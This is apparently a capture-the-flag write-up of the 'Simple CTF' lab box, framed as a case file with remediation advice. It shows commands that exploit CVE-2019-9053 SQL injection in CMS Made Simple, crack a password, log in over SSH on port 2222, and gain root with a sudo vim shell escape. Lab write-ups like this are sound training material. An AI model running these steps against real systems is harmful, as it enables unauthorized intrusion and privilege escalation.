Case file

CMSMS SQLi CVE-2019-9053, SSH on 2222, and sudo vim root

Foundations Linux engagement: unauthenticated CMS Made Simple SQLi dumped and cracked mitch’s password; SSH on port 2222 yielded a shell; NOPASSWD vim completed root.

Foundations24 minLinux · CMS · SQL Injection · Privilege Escalation
01

Engagement summary

CMS Made Simple 2.2.8 under /simple/ was vulnerable to CVE-2019-9053. Cracked admin hash authenticated SSH on 2222; sudo vim spawned root.

SIMPLE CTF exposed FTP, HTTP with CMS Made Simple 2.2.8 at /simple/, and SSH on 2222. Exploit-DB / local exploit.py for CVE-2019-9053 performed time-based SQLi against moduleinterface.php, dumping salt and mitch’s password hash; --crack with rockyou recovered secret. SSH mitch@IP -p 2222 succeeded. sudo -l allowed /usr/bin/vim; sudo vim -c ':!/bin/sh' returned root. A second home user sunbath was present but unused for the root path.

Business impact

Unauthenticated CMS SQLi is credential theft and often RCE. Nonstandard SSH ports are not secrecy. Interactive editors under sudo are root. Patch CMS Made Simple past CVE-2019-9053, require keys for SSH, and remove vim from sudoers.

02

CVE-2019-9053 dump and crack

Time-based SQLi dumped mitch’s hash; offline crack recovered secret.

OPERATOR · SQLI

savvy@lab:~$ nmap -sC -sV 10.10.25.90

21/tcp open ftp

80/tcp open http

2222/tcp open ssh

savvy@lab:~$ python exploit.py -u http://10.10.25.90/simple --crack -w /usr/share/wordlists/rockyou.txt

username: mitch password: secret

03

SSH on high port

mitch:secret authenticated on port 2222.

OPERATOR · SSH

savvy@lab:~$ ssh mitch@10.10.25.90 -p 2222

savvy@lab:~$

savvy@lab:~$ ls /home

mitch sunbath

04

sudo vim to root

NOPASSWD vim executed /bin/sh as root.

OPERATOR · ROOT

savvy@lab:~$ sudo -l

(root) NOPASSWD: /usr/bin/vim

savvy@lab:~$ sudo vim -c ':!/bin/sh'

root@lab:~# id

uid=0(root) gid=0(root) groups=0(root)

Remediation

Upgrade CMS Made Simple; WAF alone is insufficient for time-based SQLi. Prefer key-only SSH on standard ports behind ACLs. Never grant interactive editors via sudo.